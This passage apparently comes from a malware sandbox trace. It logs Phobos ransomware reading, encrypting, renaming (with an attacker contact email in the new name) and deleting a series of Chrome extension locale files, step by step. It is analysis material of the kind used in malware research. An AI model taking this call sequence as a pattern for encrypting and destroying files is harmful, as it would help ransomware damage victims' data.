HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.317] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=230) returned 1 [0148.317] CloseHandle (hObject=0x148) returned 1 [0148.318] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json")) returned 0x2020 [0148.318] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.318] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.318] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.318] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.318] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.318] ReadFile (in: hFile=0x148, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xe6, lpOverlapped=0x0) returned 1 [0148.320] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0148.320] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0148.321] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.321] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.321] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.321] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.321] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.321] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.321] CloseHandle (hObject=0x148) returned 1 [0148.321] CloseHandle (hObject=0x188) returned 1 [0148.321] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json")) returned 1 [0148.322] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.322] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.323] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=208) returned 1 [0148.323] CloseHandle (hObject=0x188) returned 1 [0148.323] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json")) returned 0x2020 [0148.323] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.323] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.323] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.324] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.324] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.324] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd0, lpOverlapped=0x0) returned 1 [0148.324] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0148.325] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0148.325] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.325] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.325] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.325] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.325] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.326] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.326] CloseHandle (hObject=0x188) returned 1 [0148.326] CloseHandle (hObject=0x148) returned 1 [0148.326] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json")) returned 1 [0148.327] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.327] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.327] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=221) returned 1 [0148.327] CloseHandle (hObject=0x148) returned 1 [0148.327] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json")) returned 0x2020 [0148.327] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.327] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.328] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.328] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.328] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.328] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.328] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.328] ReadFile (in: hFile=0x148, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xdd, lpOverlapped=0x0) returned 1 [0148.329] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0148.329] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0148.330] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.330] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.330] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.330] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.330] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.330] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.330] CloseHandle (hObject=0x148) returned 1 [0148.330] CloseHandle (hObject=0x188) returned 1 [0148.330] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json")) returned 1 [0148.331] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.331] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.331] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=236) returned 1 [0148.331] CloseHandle (hObject=0x188) returned 1 [0148.332] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json")) returned 0x2020 [0148.332] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.332] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.332] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.332] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.332] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.332] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.332] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.332] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xec, lpOverlapped=0x0) returned 1 [0148.334] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0148.334] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0148.334] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.334] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.334] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.335] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.335] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.335] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.335] CloseHandle (hObject=0x188) returned 1 [0148.335] CloseHandle (hObject=0x148) returned 1 [0148.335] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json")) returned 1 [0148.336] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.336] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.336] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=230) returned 1 [0148.336] CloseHandle (hObject=0x148) returned 1 [0148.336] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json")) returned 0x2020 [0148.336] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.336] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, 